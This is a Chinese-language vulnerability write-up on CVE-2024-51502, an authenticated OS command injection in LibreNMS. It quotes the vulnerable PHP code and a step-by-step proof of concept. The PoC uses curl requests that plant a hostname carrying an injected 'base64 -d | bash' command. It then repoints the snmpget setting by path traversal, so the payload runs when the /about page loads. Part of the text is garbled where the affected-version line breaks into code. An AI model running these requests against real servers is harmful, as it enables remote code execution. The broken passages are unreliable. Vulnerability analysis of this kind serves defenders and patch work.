LibreNMS CVE-2024-51502 Authenticated OS Command Injection Analysis

# [Critical] - Authenticated OS Command Injection ## 漏洞概述 这是一个存在于 **librenms** 中的严重漏洞（CVE-2024-51502）。攻击者可以通过构造恶意的配置参数和目录名称，结合路径遍历，最终在服务器上执行任意操作系统命令。 漏洞利用链主要包含三个步骤： 1. **配置参数投毒**：通过修改 `snmpget` 配置参数，使其包含恶意命令。 2. **任意目录创建**：通过创建 Device 时，利用主机名（Hostname）字段创建包含 shell 元字符的目录。 3. **命令执行**：利用路径遍历（`../`）将恶意配置指向刚才创建的目录，触发 `shell_exec` 执行命令。 ## 影响范围 * **受影响版本**：`librenms core (Composer)` 版本 ` 'version_webserver' => $request->server('SERVER_SOFTWARE'), 'version_rootool' => $rd:version(), 'version_snmpget' => str_replace('version: ', '', trim(shell_exec(Config::get('snmpget'), 'snmpget'))), ]); } ``` ### 2. 配置更新代码 (SettingsController.php) ```php public function update(DynamicConfig $config, Request $request, $id) { $value = $request->get('value'); if (!$config->isValidSetting($id)) { return $this->jsonResponse($id, 'is not a valid setting', null, 400); } $current = \LibreNMS\Config::get($id); $config_item = $config->get($id); if (!$config_item->checkValue($value)) { return $this->jsonResponse($id, $config_item->getValidationMessage($value), $current, 400); } if (\LibreNMS\Config::persist($id, $value)) { return $this->jsonResponse($id, 'Successfully set $id', $value); } return $this->jsonResponse($id, 'Failed to update :id', $current, 400); } ``` ### 3. 目录创建代码 (PollDevice.php) ```php private function initRrdDirectory(): void { $host_rrd = \rrd::name($this->device->hostname, ', '); if (Config::get('rrd.enable', true) && !\rrd::isDir($host_rrd)) { try { mkdir($host_rrd); Log::info("Created directory : $host_rrd"); } catch (\ErrorException $e) { Event::log("Failed to create rrd directory: $host_rrd", $this->device); Log::info($e); } } } ``` ### 4. 利用命令 (PoC) **步骤 1：创建包含恶意命令的 Device** ```bash curl -k -X POST -H "X-Requested-With: XMLHttpRequest" -H "X-CSRF-Token: " -H "Content-Type: application/json" -d '{"hostname":"whatever;echo L3Vzc1k4aWVvN0l2ZgpMTctCby7ZDtOkxkY2Y= | base64 -d | bash ; #","type":"generic","disabled":0}' https:///api/v0/devices ``` **步骤 2：确认目录创建** ```bash ls -la /var/lib/librenms/rrd/whatever/ ``` **步骤 3：更新配置触发执行** ```bash curl -k -X PUT -H "X-Requested-With: XMLHttpRequest" -H "X-CSRF-Token: " -H "Content-Type: application/json" -d '{"value":"/var/lib/librenms/rrd/whatever/../../../../../../tmp/rce-proof"}' https:///api/v0/settings/snmpget ``` **步骤 4：触发 Payload** 访问 `/about` 页面。 **步骤 5：验证执行** ```bash ls -la /tmp/rce-proof ```

Goal Reached Thanks to every supporter — we hit 100%!

LibreNMS CVE-2024-51502 Authenticated OS Command Injection Analysis

More from this source